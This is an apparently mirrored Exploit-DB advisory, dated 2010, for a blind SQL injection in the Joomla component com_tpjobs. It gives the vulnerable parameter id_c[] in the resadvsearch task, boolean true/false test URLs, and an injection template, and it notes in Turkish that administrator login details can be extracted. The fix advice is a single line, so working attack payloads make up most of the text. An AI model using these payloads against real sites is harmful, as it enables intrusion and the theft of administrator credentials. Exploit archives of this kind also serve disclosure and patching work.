Joomla! Component com_tpjobs – Blind SQL Injection - 体验盒子

作者： FL0RiX

日期： 2010-01-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/10950/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

<------------------- header data start ------------------- >

#####################################################################

#Joomla Component com_tpjobs Blind SQL injection Vulnerability

#####################################################################

# author: FL0RiX

# Name : com_tpjobs

# Bug Type : (Blind) SQL Injection

# Infection: Admin login bilgileri alınabilir.

# Demo Vuln. :

TRUE(+)

» http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1

FALSE(-)

» http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0

# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]

< -- bug code end of -- >